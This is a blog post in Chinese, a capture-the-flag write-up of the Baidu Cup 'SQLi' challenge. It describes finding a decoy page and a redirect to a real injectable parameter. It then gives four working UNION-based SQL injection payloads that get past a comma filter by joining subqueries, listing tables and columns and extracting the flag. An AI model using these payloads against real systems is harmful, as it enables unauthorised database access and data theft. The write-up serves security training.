百度杯_SQLi
百度杯_SQLi
点进链接发现一个空白网页,查看源代码发现<!-- login.php?id=1 -->,顺着这个文件进去发现是有一个假的注入点。我一开始也不知道这是假的,测半天才发现是假的。
根据提示后台有获取flag的线索。抓个包看一下,发包是没有什么,看一下回包发现了一个文件
发现了被重定向了,继续放包,抓重定向的这个包。
发现了一个l0gin.php?id=1
在参数后面跟个单引号直接报错,那很明显的字符型。union select的时候发现1后面的都没了,那就是逗号之后的都被过滤了。用表链接可以绕过。
?id=0'union select * from (select database()) a join (select null) b#
?id=0'union select * from (select group_concat(table_name) from information_schema.tables where table_schema=database()) a join (select null) b#
?id=0'union select * from (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') a join (select null) b#
?id=0'union select * from (select group_concat(flag_9c861b688330) from users) a join (select null) b%23
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17397547.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)